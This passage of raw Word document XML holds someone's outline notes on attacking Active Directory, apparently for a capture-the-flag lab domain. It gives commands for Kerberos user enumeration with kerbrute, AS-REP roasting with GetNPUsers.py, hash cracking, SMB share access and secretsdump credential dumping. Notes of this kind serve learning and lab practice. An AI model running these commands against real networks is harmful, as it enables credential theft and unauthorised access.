        <w:t xml:space="preserve"> address&gt; &lt;username file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A9A417" w14:textId="55D01B0C" w:rsidR="00195950" w:rsidRPr="0084205E" w:rsidRDefault="00195950" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidR="00452681" w:rsidRPr="0084205E">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00452681" w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00452681" w:rsidRPr="0084205E">
        <w:t>kerbrute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00452681" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00452681" w:rsidRPr="0084205E">
        <w:t>userenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00452681" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> --dc 10.10.77.160 -d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00452681" w:rsidRPr="0084205E">
        <w:t>spookysec.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00452681" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> userlist.txt -t 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C06933" w14:textId="287FFB24" w:rsidR="00815A7E" w:rsidRPr="0084205E" w:rsidRDefault="00815A7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>look for important usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D26A2C" w14:textId="5A8EF09A" w:rsidR="00815A7E" w:rsidRPr="0084205E" w:rsidRDefault="00815A7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B12B33" w14:textId="03CD8962" w:rsidR="00815A7E" w:rsidRPr="0084205E" w:rsidRDefault="00815A7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>backups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C1830" w14:textId="3EE736CD" w:rsidR="00815A7E" w:rsidRPr="0084205E" w:rsidRDefault="00815A7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472E2898" w14:textId="1FAAA523" w:rsidR="00815A7E" w:rsidRPr="0084205E" w:rsidRDefault="00815A7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Following enumeration of user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708DFC70" w14:textId="33ACA229" w:rsidR="00815A7E" w:rsidRPr="0084205E" w:rsidRDefault="00815A7E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">abuse feature within Kerberos via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>AS</w:t>
      </w:r>
      <w:r w:rsidR="000D7F08" w:rsidRPr="0084205E">
        <w:t>REPRoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00D5D12C" w14:textId="74A9EE38" w:rsidR="000D7F08" w:rsidRPr="0084205E" w:rsidRDefault="000D7F08" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>returns a hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487478C3" w14:textId="7619887D" w:rsidR="000D7F08" w:rsidRPr="0084205E" w:rsidRDefault="000D7F08" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>occurs when a user account has the privilege “Does not require Pre-Authentication” set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C961719" w14:textId="403B07F2" w:rsidR="000D7F08" w:rsidRPr="0084205E" w:rsidRDefault="000D7F08" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>no TGT required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B27F105" w14:textId="711551DD" w:rsidR="000D7F08" w:rsidRPr="0084205E" w:rsidRDefault="000D7F08" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F28F4F" w14:textId="08326EC5" w:rsidR="000D7F08" w:rsidRPr="0084205E" w:rsidRDefault="000D7F08" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D03E08" w14:textId="7E13CDDC" w:rsidR="000D7F08" w:rsidRPr="0084205E" w:rsidRDefault="000D7F08" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> tool GetNPUsers.py (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/Examples/GetNPUsers.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CD6CED" w14:textId="5A36BE69" w:rsidR="000D7F08" w:rsidRPr="0084205E" w:rsidRDefault="000D7F08" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">allows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ASReproastable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> accounts from the Key Distribution Center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0133A86D" w14:textId="13F1F424" w:rsidR="000D7F08" w:rsidRPr="0084205E" w:rsidRDefault="000D7F08" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">only thing needed is a valid set of usernames, enumerated via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerbrute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="442FBAAE" w14:textId="3D6B2152" w:rsidR="000D7F08" w:rsidRPr="0084205E" w:rsidRDefault="000D7F08" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GetNPUsers</w:t>
      </w:r>
      <w:r w:rsidR="00AE767A" w:rsidRPr="0084205E">
        <w:t>.py &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE767A" w:rsidRPr="0084205E">
        <w:t>domain.ext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE767A" w:rsidRPr="0084205E">
        <w:t>/user&gt; -no-pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EA2413" w14:textId="0DBAF83F" w:rsidR="00AE767A" w:rsidRPr="0084205E" w:rsidRDefault="00AE767A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. GetNPUsers.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>spookysec.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/svc-admin -no-pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D24979" w14:textId="4339B830" w:rsidR="00AE767A" w:rsidRPr="0084205E" w:rsidRDefault="00AE767A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>hash return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185BDD36" w14:textId="6E9C1F6F" w:rsidR="00AE767A" w:rsidRPr="0084205E" w:rsidRDefault="00AE767A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>copy and save to txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766ECAA0" w14:textId="3EAF6745" w:rsidR="00AE767A" w:rsidRPr="0084205E" w:rsidRDefault="00AE767A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>john &lt;hash file&gt; --wordlist=&lt;password file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1989D8" w14:textId="47D391AA" w:rsidR="009644B6" w:rsidRPr="0084205E" w:rsidRDefault="009644B6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BA8C6B8" w14:textId="7EDD5309" w:rsidR="009644B6" w:rsidRPr="0084205E" w:rsidRDefault="009644B6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Once username and password collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC78DE3" w14:textId="26230DC9" w:rsidR="009644B6" w:rsidRPr="0084205E" w:rsidRDefault="009644B6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To determine what the account is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA0A4DB" w14:textId="156F5BAD" w:rsidR="009644B6" w:rsidRPr="0084205E" w:rsidRDefault="009644B6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>psexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1CA8CD" w14:textId="0A8C2DA1" w:rsidR="009644B6" w:rsidRPr="0084205E" w:rsidRDefault="009644B6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>smbexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBF3090" w14:textId="29D48E7E" w:rsidR="009644B6" w:rsidRPr="0084205E" w:rsidRDefault="009644B6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>wmiexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B53A2" w14:textId="33BC536C" w:rsidR="009644B6" w:rsidRPr="0084205E" w:rsidRDefault="009644B6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">To try and gain access and determine </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>privs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and access levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD91B8B" w14:textId="1927E9A1" w:rsidR="009644B6" w:rsidRPr="0084205E" w:rsidRDefault="009644B6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">try </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -L </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\\\&lt;ip&gt;\\</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -u &lt;user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3A74FF" w14:textId="57A47F2B" w:rsidR="009644B6" w:rsidRPr="0084205E" w:rsidRDefault="009644B6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF75F4" w14:textId="3F117B85" w:rsidR="009644B6" w:rsidRPr="0084205E" w:rsidRDefault="009644B6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>enter password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC6566" w14:textId="78288D18" w:rsidR="009644B6" w:rsidRPr="0084205E" w:rsidRDefault="009644B6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Detect what shares this profile has access to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B9D12C" w14:textId="60535A13" w:rsidR="0015117C" w:rsidRPr="0084205E" w:rsidRDefault="0015117C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>or if anything stands out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B38089" w14:textId="339F7C95" w:rsidR="0015117C" w:rsidRPr="0084205E" w:rsidRDefault="0015117C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Try to connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087B2A29" w14:textId="7D4AE220" w:rsidR="0015117C" w:rsidRPr="0084205E" w:rsidRDefault="0015117C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\\\&lt;ip&gt;\\&lt;share</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> name&gt; -U &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD1EF6B" w14:textId="186CB3E7" w:rsidR="0015117C" w:rsidRPr="0084205E" w:rsidRDefault="0015117C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run and enter password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3E5480" w14:textId="1E307CA2" w:rsidR="0015117C" w:rsidRPr="0084205E" w:rsidRDefault="0015117C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“get” command noteworthy files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BA8E88" w14:textId="5306489E" w:rsidR="00A73C78" w:rsidRPr="0084205E" w:rsidRDefault="0015117C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>secretsdump.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B9218" w14:textId="331CC139" w:rsidR="0015117C" w:rsidRPr="0084205E" w:rsidRDefault="0015117C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>syntax – secretsdump.py &lt;domain/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>user:’password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>’&gt;@&lt;ip&gt; -just-dc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D69CB" w14:textId="66273784" w:rsidR="00A73C78" w:rsidRPr="0084205E" w:rsidRDefault="00A73C78" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>dumps out NTLM hashes and Kerberos keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0989A44A" w14:textId="216A5840" w:rsidR="00332429" w:rsidRPr="0084205E" w:rsidRDefault="00332429" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DRSUAPI method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529EA10" w14:textId="7A0D0EA9" w:rsidR="00A73C78" w:rsidRPr="0084205E" w:rsidRDefault="00A73C78" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
